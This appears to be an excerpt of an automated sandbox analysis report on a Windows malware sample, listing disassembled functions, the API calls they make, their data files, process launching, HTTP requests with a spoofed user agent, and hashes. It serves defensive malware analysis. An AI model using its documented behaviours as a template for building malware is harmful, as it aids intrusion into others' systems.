                                                                    • API ID: File$CloseCreateHandle$View$MappingSizeUnmapWritememcmp
                                                                    • String ID: .Mw
                                                                    • API String ID: 3902698870-2453323595
                                                                    • Opcode ID: 3dd30dc439ad3f7a5ebd7dce9fe05c3210832a6c06382493a81f5afd8b17f853
                                                                    • Instruction ID: 0da617c1af0bd4dbc976a582f880bbe3058530cb6ade4bb6176e088db5cb8200
                                                                    • Opcode Fuzzy Hash: 3dd30dc439ad3f7a5ebd7dce9fe05c3210832a6c06382493a81f5afd8b17f853
                                                                    • Instruction Fuzzy Hash: D3516DB5E00308FBDB14DBA4CC49BEEB774AB48304F108569F611BB2C1D7B9AA40CB58
                                                                    Function 0040B2C0 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 107fileCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 268 40b2c0-40b2d8 InitializeCriticalSection 269 40b2e3-40b2ea 268->269 270 40b309-40b32a CreateFileW 269->270 271 40b2ec-40b2ff call 40d4a0 call 40aea0 269->271 273 40b330-40b34b CreateFileMappingW 270->273 274 40b3f2-40b415 call 40ab60 call 40d160 270->274 283 40b304-40b307 271->283 276 40b351-40b36a MapViewOfFile 273->276 277 40b3e8-40b3eb 273->277 280 40b36c-40b389 GetFileSize 276->280 281 40b3de-40b3e1 276->281 277->274 284 40b39d-40b3a3 280->284 281->277 283->269 287 40b3d4-40b3d8 UnmapViewOfFile 284->287 288 40b3a5-40b3ac 284->288 287->281 288->287 290 40b3ae-40b3d2 call 40d4a0 call 40aea0 288->290 290->284
                                                                    APIs
                                                                    • InitializeCriticalSection.KERNEL32(00416690,?,?,?,?,?,?,00407A56), ref: 0040B2CB
                                                                    • CreateFileW.KERNEL32(C:\Users\user\tbtnds.dat,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040B31D
                                                                    • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040B33E
                                                                    • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040B35D
                                                                    • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040B372
                                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 0040B3D8
                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040B3E2
                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040B3EC
                                                                      • Part of subcall function 0040D4A0: NtQuerySystemTime.NTDLL(0040B3B5), ref: 0040D4AA
                                                                      • Part of subcall function 0040D4A0: RtlTimeToSecondsSince1980.NTDLL(0040B3B5,?), ref: 0040D4B8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: File$CloseCreateHandleTimeView$CriticalInitializeMappingQuerySecondsSectionSince1980SizeSystemUnmap
                                                                    • String ID: C:\Users\user\tbtnds.dat$Vz@$.Mw
                                                                    • API String ID: 439099756-284525557
                                                                    • Opcode ID: b646a7b07f4a3dc35abcfcdb9ddb4a95ecf8a323ec4e95c146113b602af952b7
                                                                    • Instruction ID: 3b431581fb8605495e02e5545908ab4f756817927d1539066ca4ce1953719e7c
                                                                    • Opcode Fuzzy Hash: b646a7b07f4a3dc35abcfcdb9ddb4a95ecf8a323ec4e95c146113b602af952b7
                                                                    • Instruction Fuzzy Hash: 91411C74E40309EBDB10DFA4DC4ABAEB774EB44704F208569EA11BA2C1C7B96541CB9D
                                                                    Function 00405BC0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 97fileCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 296 405bc0-405bf2 InitializeCriticalSection CreateFileW 297 405ce5-405ce8 296->297 298 405bf8-405c13 CreateFileMappingW 296->298 299 405c19-405c32 MapViewOfFile 298->299 300 405cdb-405cde 298->300 301 405cd1-405cd4 299->301 302 405c38-405c4a GetFileSize 299->302 300->297 301->300 303 405c4d-405c51 302->303 304 405c53-405c5a 303->304 305 405cc7-405ccb UnmapViewOfFile 303->305 306 405c5c 304->306 307 405c5e-405c71 call 40c820 304->307 305->301 306->305 310 405c73 307->310 311 405c75-405c8a 307->311 310->305 312 405c9a-405cc5 call 405cf0 311->312 313 405c8c-405c98 call 40a1b0 311->313 312->303 313->305
                                                                    APIs
                                                                    • InitializeCriticalSection.KERNEL32(00415E30,?,?,?,?,?,00407A20), ref: 00405BCB
                                                                    • CreateFileW.KERNEL32(C:\Users\user\tbtcmds.dat,80000000,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,00407A20), ref: 00405BE5
                                                                    • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 00405C06
                                                                    • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00405C25
                                                                    • GetFileSize.KERNEL32(000000FF,00000000), ref: 00405C3E
                                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 00405CCB
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00405CD5
                                                                    • CloseHandle.KERNEL32(000000FF), ref: 00405CDF
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: File$CloseCreateHandleView$CriticalInitializeMappingSectionSizeUnmap
                                                                    • String ID: C:\Users\user\tbtcmds.dat$.Mw
                                                                    • API String ID: 3956458805-796022103
                                                                    • Opcode ID: 7cb746dfae3c77901cbfeb316d20c0ef760ad0ada3adb76a8fe376954cbd565b
                                                                    • Instruction ID: 44e1aa5071e985e1939c8a19f3b292d5e35966d71e561f6040ad28af9ac572d1
                                                                    • Opcode Fuzzy Hash: 7cb746dfae3c77901cbfeb316d20c0ef760ad0ada3adb76a8fe376954cbd565b
                                                                    • Instruction Fuzzy Hash: 4B31FD74E44309EBEB14DBA4CD49BAFBB74EB48700F208569E601772C0D7B96941CF99
                                                                    Function 0040E980 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 60sleepprocessCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 318 40e980-40e9e0 memset * 2 CreateProcessW 319 40e9f1-40ea15 ShellExecuteW 318->319 320 40e9e2-40e9ef Sleep 318->320 322 40ea26 319->322 323 40ea17-40ea24 Sleep 319->323 321 40ea28-40ea2b 320->321 322->321 323->321
                                                                    APIs
                                                                    • memset.NTDLL ref: 0040E98E
                                                                    • memset.NTDLL ref: 0040E99E
                                                                    • CreateProcessW.KERNEL32(00000000,Gy@,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 0040E9D7
                                                                    • Sleep.KERNEL32(000003E8), ref: 0040E9E7
                                                                    • ShellExecuteW.SHELL32(00000000,open,Gy@,00000000,00000000,00000000), ref: 0040EA02
                                                                    • Sleep.KERNEL32(000003E8), ref: 0040EA1C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: Sleepmemset$CreateExecuteProcessShell
                                                                    • String ID: $D$Gy@$open
                                                                    • API String ID: 3787208655-4184347819
                                                                    • Opcode ID: 5ee7fdc591246df9419d0b661744b6941cf0467c5ddd8ade60e7ca7f41f9299c
                                                                    • Instruction ID: afb7e97e53159593a654a1f5a0506a904f07d925a59540ad2b26a1d3cea08ed0
                                                                    • Opcode Fuzzy Hash: 5ee7fdc591246df9419d0b661744b6941cf0467c5ddd8ade60e7ca7f41f9299c
                                                                    • Instruction Fuzzy Hash: 08114271A90308BBE710DB91CD46FDE7774AB04B00F200129F6087E2C1D6F9AA54CB59
                                                                    Function 0040D2D0 Relevance: 16.6, APIs: 11, Instructions: 95threadsleepsynchronizationCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 348 40d2d0-40d300 GetCurrentThread GetThreadPriority GetCurrentThread SetThreadPriority 349 40d306-40d31a InterlockedExchangeAdd 348->349 350 40d3e9-40d400 GetCurrentThread SetThreadPriority 348->350 349->350 351 40d320-40d329 349->351 352 40d32c-40d333 351->352 352->350 353 40d339-40d354 EnterCriticalSection 352->353 354 40d35f-40d367 353->354 355 40d3a7-40d3bc LeaveCriticalSection 354->355 356 40d369-40d376 354->356 359 40d3c7-40d3cd 355->359 360 40d3be-40d3c5 355->360 357 40d383-40d3a5 WaitForSingleObject 356->357 358 40d378-40d381 356->358 361 40d356-40d35c 357->361 358->361 362 40d3dc-40d3e4 Sleep 359->362 363 40d3cf-40d3d8 359->363 360->350 361->354 362->352 363->362 364 40d3da 363->364 364->350
                                                                    APIs
                                                                    • GetCurrentThread.KERNEL32 ref: 0040D2D6
                                                                    • GetThreadPriority.KERNEL32(00000000,?,?,?,00407AD2,020D0638,000000FF), ref: 0040D2DD
                                                                    • GetCurrentThread.KERNEL32 ref: 0040D2E8
                                                                    • SetThreadPriority.KERNEL32(00000000,?,?,?,00407AD2,020D0638,000000FF), ref: 0040D2EF
                                                                    • InterlockedExchangeAdd.KERNEL32(00407AD2,00000000), ref: 0040D312
                                                                    • EnterCriticalSection.KERNEL32(000000FB), ref: 0040D347
                                                                    • WaitForSingleObject.KERNEL32(000000FF,00000000), ref: 0040D392
                                                                    • LeaveCriticalSection.KERNEL32(000000FB), ref: 0040D3AE
                                                                    • Sleep.KERNEL32(00000001), ref: 0040D3DE
                                                                    • GetCurrentThread.KERNEL32 ref: 0040D3ED
                                                                    • SetThreadPriority.KERNEL32(00000000,?,?,?,00407AD2), ref: 0040D3F4
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: Thread$CurrentPriority$CriticalSection$EnterExchangeInterlockedLeaveObjectSingleSleepWait
                                                                    • String ID:
                                                                    • API String ID: 3862671961-0
                                                                    • Opcode ID: 5618e667e755a89869c685173e38bf799e2d1f6c3c7819217eae43ff0fa2d7e3
                                                                    • Instruction ID: a8d0ef9cc0f8c3f9fe641a145e15df681aa384361be6a62e8494921e8eef4e23
                                                                    • Opcode Fuzzy Hash: 5618e667e755a89869c685173e38bf799e2d1f6c3c7819217eae43ff0fa2d7e3
                                                                    • Instruction Fuzzy Hash: 0A411A74D00209EFDB04DFE4D888BAEBB71EB44315F14816AE916A7380D7789A85CF5A
                                                                    Function 00406060 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 176fileCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 365 406060-40608a EnterCriticalSection call 40c880 368 406090-4060a3 call 40c820 365->368 369 4062a3-4062b4 LeaveCriticalSection 365->369 368->369 372 4060a9-4060b8 368->372 373 4060c3-4060cc 372->373 374 4060d2-4060f0 373->374 375 4061c6-4061cc 373->375 378 4060f2 374->378 379 4060f4-4061bf memcpy call 40a1b0 call 40a220 call 40a1b0 call 40c190 call 407310 374->379 376 4061f9-40620b call 40a1b0 375->376 377 4061ce-4061dc call 405cf0 375->377 376->369 388 406211-406232 CreateFileW 376->388 384 4061e1-4061e9 377->384 378->373 379->375 384->376 387 4061eb-4061f5 384->387 387->376 388->369 390 406234-40623b 388->390 392 406246-40624f 390->392 395 406251-40628d WriteFile 392->395 396 40628f-40629c FlushFileBuffers 392->396 398 40623d-406243 395->398 396->369 398->392
                                                                    APIs
                                                                    • EnterCriticalSection.KERNEL32(00415E30,00000000,0040B8F2,006A0266,?,0040B90E,00000000,0040CBEC,?), ref: 0040606F
                                                                    • memcpy.NTDLL(?,00000000,00000100), ref: 00406101
                                                                    • CreateFileW.KERNEL32(C:\Users\user\tbtcmds.dat,40000000,00000000,00000000,00000002,00000002,00000000), ref: 00406225
                                                                    • WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 00406287
                                                                    • FlushFileBuffers.KERNEL32(000000FF), ref: 00406293
                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040629D
                                                                    • LeaveCriticalSection.KERNEL32(00415E30,?,?,?,?,?,?,0040B90E,00000000,0040CBEC,?), ref: 004062A8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: File$CriticalSection$BuffersCloseCreateEnterFlushHandleLeaveWritememcpy
                                                                    • String ID: C:\Users\user\tbtcmds.dat$.Mw
                                                                    • API String ID: 1457358591-796022103
                                                                    • Opcode ID: c2df7c7b077ac60798c6fa4429fae4edc702456a9307d602ca0cebd3616530a6
                                                                    • Instruction ID: bb102638da67a563b53aa46b2a5b6ce2f3b38349fb156310049a7a66f3822ae6
                                                                    • Opcode Fuzzy Hash: c2df7c7b077ac60798c6fa4429fae4edc702456a9307d602ca0cebd3616530a6
                                                                    • Instruction Fuzzy Hash: 1D71DEB5E002099BCB04DF94D981FEFB7B1BB88304F14816DE505BB382D779A951CBA5
                                                                    Function 0040AB80 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 74fileCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 420 40ab80-40ab8d 421 40ab94-40abb2 call 409fa0 420->421 422 40ab8f 420->422 423 40ac6c-40ac6f 421->423 426 40abb8-40abbf 421->426 422->423 427 40abca-40abd3 426->427 428 40ac04-40ac25 CreateFileW 427->428 429 40abd5-40ac02 427->429 431 40ac53-40ac69 InterlockedExchange call 40a1b0 428->431 432 40ac27-40ac4c WriteFile FlushFileBuffers 428->432 429->427 431->423 432->431
                                                                    APIs
                                                                    • CreateFileW.KERNEL32(C:\Users\user\tbtnds.dat,40000000,00000000,00000000,00000002,00000002,00000000), ref: 0040AC18
                                                                    • WriteFile.KERNEL32(000000FF,00000000,?,?,00000000), ref: 0040AC39
                                                                    • FlushFileBuffers.KERNEL32(000000FF), ref: 0040AC43
                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040AC4D
                                                                    • InterlockedExchange.KERNEL32(00415260,0000003D), ref: 0040AC5A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: File$BuffersCloseCreateExchangeFlushHandleInterlockedWrite
                                                                    • String ID: C:\Users\user\tbtnds.dat$.Mw
                                                                    • API String ID: 442028454-2746958872
                                                                    • Opcode ID: 32a3c22131d2a02b3799ca2c8e2e6ace852a549deac0f95c4e37c00c6502dd7f
                                                                    • Instruction ID: b83d763b1b95064d17473309c927232932c49c75998401e70db37280cdfd902f
                                                                    • Opcode Fuzzy Hash: 32a3c22131d2a02b3799ca2c8e2e6ace852a549deac0f95c4e37c00c6502dd7f
                                                                    • Instruction Fuzzy Hash: 46318CB4E00208EFDB00CF94EC85FAEB775BB48300F218569E515A7390C774AA51CB59
                                                                    Function 0040D890 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 60sleepCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040D8DE
                                                                    • Sleep.KERNEL32(000003E8), ref: 0040D8EE
                                                                    • StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040D90B
                                                                    • StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040D921
                                                                    • StrChrA.SHLWAPI(?,0000000D), ref: 0040D94E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: Sleeprecvfrom
                                                                    • String ID: HTTP/1.1 200 OK$LOCATION:
                                                                    • API String ID: 668330359-3973262388
                                                                    • Opcode ID: 64c51f4f778a0849bb65c465f972bc246fe4ea33ddc01750ea485b3e9e3c6488
                                                                    • Instruction ID: aa1d0310fbaa0e5548ad160d3530673878f91993e129ff42f305da2a80d3425b
                                                                    • Opcode Fuzzy Hash: 64c51f4f778a0849bb65c465f972bc246fe4ea33ddc01750ea485b3e9e3c6488
                                                                    • Instruction Fuzzy Hash: 88215EB5D00218ABDB20DF64DC49BE97774AB04708F1486E9E719B62C0C7B95ACA8F5C
                                                                    Function 0040EA30 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 57networksleepCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36,00000001,00000000,00000000,00000000), ref: 0040EA47
                                                                    • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040EA66
                                                                    • HttpQueryInfoA.WININET(00000000,20000005,?,00000004,00000000), ref: 0040EA8F
                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040EAB8
                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040EAC2
                                                                    • Sleep.KERNEL32(000003E8), ref: 0040EACD
                                                                    Strings
                                                                    • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36, xrefs: 0040EA42
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: Internet$CloseHandleOpen$HttpInfoQuerySleep
                                                                    • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                    • API String ID: 2743515581-2960703779
                                                                    • Opcode ID: ef8e19ed345852c8d52971dd1004b0fcc021cc447378e9d991bc7cd61a6891ce
                                                                    • Instruction ID: 45b81d3650d60dd7d70083547d95fe89803667d47bfd0af2cf5eef3cde06382e
                                                                    • Opcode Fuzzy Hash: ef8e19ed345852c8d52971dd1004b0fcc021cc447378e9d991bc7cd61a6891ce
                                                                    • Instruction Fuzzy Hash: 4021E774A40308BBEB11DB94CC49FEEB775BB48705F1085A9FA11AA2C0C7B96A40CB55
                                                                    Function 00407440 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 71sleepCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: Sleep$CacheDeleteEntrywsprintf
                                                                    • String ID: %s%s
                                                                    • API String ID: 1447977647-3252725368
                                                                    • Opcode ID: 2af734eb8a68885c7578e528b5e2c09e32b601dfce958a0453a982a9a53f2003
                                                                    • Instruction ID: 516f793b53608c34cc4cf2fa152c24c34b7f811ac1bf05daad4eae6c0a67dd49
                                                                    • Opcode Fuzzy Hash: 2af734eb8a68885c7578e528b5e2c09e32b601dfce958a0453a982a9a53f2003
                                                                    • Instruction Fuzzy Hash: DB31FAB0D00218ABCB50DFA9D8887DDBBB4FB08305F1085AAE519B6291D7795AC4CF5A
                                                                    Function 004063A0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 55registryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetLogicalDrives.KERNEL32 ref: 004063A6
                                                                    • RegOpenKeyExW.KERNEL32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 004063F4
                                                                    • RegQueryValueExW.KERNEL32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 00406421
                                                                    • RegCloseKey.ADVAPI32(?), ref: 0040643E
                                                                    Strings
                                                                    • NoDrives, xrefs: 00406418
                                                                    • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, xrefs: 004063E7
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: CloseDrivesLogicalOpenQueryValue
                                                                    • String ID: NoDrives$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
                                                                    • API String ID: 2666887985-3471754645
                                                                    • Opcode ID: 314293f9e134081a44844c09a9b0f17b23a1eb3db84437885ffb7fb3e0008323
                                                                    • Instruction ID: 69498c8574f0fe75ee0e18bc350880e9ca7d597cc08e8ba402afd13981da7d97
                                                                    • Opcode Fuzzy Hash: 314293f9e134081a44844c09a9b0f17b23a1eb3db84437885ffb7fb3e0008323
                                                                    • Instruction Fuzzy Hash: AC11DD71E4020A9BDB10CFD4D946BEEBBB4FB08708F118159E911B7280D7B85695CF99
                                                                    Function 0040D160 Relevance: 9.1, APIs: 6, Instructions: 80threadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040D184
                                                                      • Part of subcall function 0040D250: WaitForSingleObject.KERNEL32(?,00000000), ref: 0040D290
                                                                      • Part of subcall function 0040D250: CloseHandle.KERNEL32(?), ref: 0040D2A9
                                                                    • CreateThread.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 0040D1DF
                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040D21C
                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040D227
                                                                    • DuplicateHandle.KERNEL32(00000000), ref: 0040D22E
                                                                    • LeaveCriticalSection.KERNEL32(-00000004), ref: 0040D242
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalCurrentHandleProcessSection$CloseCreateDuplicateEnterLeaveObjectSingleThreadWait
                                                                    • String ID:
                                                                    • API String ID: 2251373460-0
                                                                    • Opcode ID: 0f4ce32234228e51373a718084f49bdd165b62b4cc5873150e0a73e2794c4448
                                                                    • Instruction ID: b4a3372add05cffca1b77c7dac60b50b4844df58a08520f3d20c10534500f2db
                                                                    • Opcode Fuzzy Hash: 0f4ce32234228e51373a718084f49bdd165b62b4cc5873150e0a73e2794c4448
                                                                    • Instruction Fuzzy Hash: 6B31D6B4A00209EFDB04DF98D889F9EBBB5FB48304F1081A8E905A7391D775EA95CF54
                                                                    Function 00407370 Relevance: 9.1, APIs: 6, Instructions: 65sleepCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
